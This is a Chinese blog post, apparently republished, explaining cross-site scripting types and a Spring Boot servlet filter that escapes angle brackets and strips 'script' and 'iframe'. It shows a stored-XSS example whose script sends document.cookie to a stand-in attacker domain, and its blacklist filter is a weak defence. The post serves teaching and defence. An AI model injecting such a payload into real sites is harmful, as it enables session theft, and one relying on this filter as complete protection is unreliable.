当前位置:   article > 正文

XSS(跨站脚本攻击)及部分解决方案_xss攻击原理与解决方法

xss攻击原理与解决方法

最近做的部门内部用的一个小项目要上线,上线前安全测试测出了存储型XSS漏洞,自己也通过这个机会学习了一下,在此记录

 

1、什么是XSS


XSS的中文含义是跨站脚本攻击,Cross Site Scripting,缩写为CSS,但容易与层叠样式表的缩写混淆,所以有人将其缩写为XSS

 

2、XSS原理


html是超文本标记语言,通过一些字符特殊对待来区分文本和标记,例如:<被看作html标签的开始,>被看作html标签的结束,那么<title>与</title>之间的内容就会被看作是标题。如果动态页面中插入的内容包含这些特殊字符(如:<等),用户浏览器就会将其误认为是html标签,如果被认为是html标签的内容中引入了一些js脚本,那么这些脚本就会在用户浏览器中执行,所以当这些特殊字符不能被动态界面检查或识别的时候,就会出现XSS漏洞。

 

3、XSS危害


1、窃取管理员帐号或Cookie,入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。
2、窃取用户的个人信息或者登录帐号,对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。
3、网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。
4、发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。

 

4、XSS分类


反射型XSS:攻击者通过向某URL中追加非法脚本(非法脚本其实就是通过非法字符构成的脚本)的方式,使得用户在访问此URL的时候会执行脚本内容,使得攻击者窃取到想要的数据。因为反射型XSS不会永久存储数据,只发生在用户一次访问过程中,所以有时也被叫做“非持久型XSS”

例如:在url中追加<script>alert('你被攻击了!')</script>,那么用户在访问url的时候就会弹出'你被攻击了!',这只是很简单的模拟场景,真实攻击的时候并不会这么简单,而是在脚本中抓取用户数据等,造成信息泄露。

个人理解的反射型XSS流程图

存储型XSS:

也叫“持久型XSS”,攻击者通过页面中的输入信息输入非法字符,并通过浏览器传送到服务器,以数据形式永久存储至数据库中,用户每次访问此数据都会触发非法脚本,造成持久性的危害。

例如:在web平台中添加信息时,将信息的备注属性设置为

  1. <a id='attacker'>点击就送百元现金</a>
  2. <script>
  3. document.getElementById('attacker').href=
  4. 'http://www.attacker_741.com/receiveCookies.html?'+document.cookie;
  5. </script>

之后点击添加,这段脚本就会作为备注存入至数据库中,之后每次访问相关的信息时,都会带着cookie信息跳转,造成持久性的攻击

存储型XSS流程与反射型XSS一样,区别在于存储型XSS会将非法脚本存入数据库,构成更加持久的危害。

 

DOM型XSS:

小白表示很迷.........

借鉴:DOM XSS是基于在js上的。而且他不需要与服务端进行交互,像反射、储蓄都需要服务端的反馈来构造xss,因为服务端对我们是不可见的

 

5、存储型XSS攻击Java解决方案


我的项目被扫出的只有存储型XSS漏洞,所以我只做了存储型XSS的漏洞修复,其他的后期遇到会补充进来。

我在网上看了挺多修复的方式,可以前端通过正则验证非法字符,也可以后端通过过滤器处理HttpRequest中的特殊字符,我是后端,对于改前端多少有些排斥,所以选择了配置过滤器的方式才进行漏洞修复。Springboot项目中代码如下:

  1. package com.web.filter;
  2. import com.web.interceptor.XSSInterceptor;
  3. import org.springframework.stereotype.Component;
  4. import javax.servlet.*;
  5. import javax.servlet.http.HttpServletRequest;
  6. import java.io.IOException;
  7. /**
  8. * @author Peacock_
  9. * @version 1.0
  10. * @date 2019/12/25 14:47
  11. * 用于避免存储型XSS漏洞
  12. */
  13. @Component
  14. public class XSSFilter implements Filter {
  15. FilterConfig filterConfig = null;
  16. @Override
  17. public void init(FilterConfig filterConfig) throws ServletException {
  18. this.filterConfig = filterConfig;
  19. }
  20. @Override
  21. public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
  22. filterChain.doFilter(new XSSInterceptor( (HttpServletRequest) servletRequest), servletResponse);
  23. }
  24. @Override
  25. public void destroy() {
  26. this.filterConfig = null;
  27. }
  28. }
  1. package com.web.interceptor;
  2. import javax.servlet.http.HttpServletRequest;
  3. import javax.servlet.http.HttpServletRequestWrapper;
  4. /**
  5. * @author Peacock_
  6. * @version 1.0
  7. * @date 2019/12/25 14:51
  8. * 用于处理特殊字符
  9. */
  10. public class XSSInterceptor extends HttpServletRequestWrapper {
  11. public XSSInterceptor(HttpServletRequest request) {
  12. super(request);
  13. }
  14. public String[] getParameterValues(String parameter) {
  15. String[] values = super.getParameterValues(parameter);
  16. if (values==null) {
  17. return null;
  18. }
  19. int count = values.length;
  20. String[] encodedValues = new String[count];
  21. for (int i = 0; i < count; i++) {
  22. encodedValues[i] = cleanXSS(values[i]);
  23. }
  24. return encodedValues;
  25. }
  26. public String getParameter(String parameter) {
  27. String value = super.getParameter(parameter);
  28. if (value == null) {
  29. return null;
  30. }
  31. return cleanXSS(value);
  32. }
  33. public String getHeader(String name) {
  34. String value = super.getHeader(name);
  35. if (value == null)
  36. return null;
  37. return cleanXSS(value);
  38. }
  39. /**过滤规则
  40. * 1、"script"替换为""
  41. * 2、"<"替换为"&lt;"
  42. * 3、">"替换为"&gt;"
  43. * 4、"iframe"替换为""
  44. * @param value
  45. * @return
  46. */
  47. private String cleanXSS(String value) {
  48. value = value.replaceAll("<", "&lt;").replaceAll(">", "&gt;");
  49. value = value.replaceAll("script", " ");
  50. value = value.replaceAll("iframe", " ");
  51. value = value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
  52. return value;
  53. }
  54. }

 

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号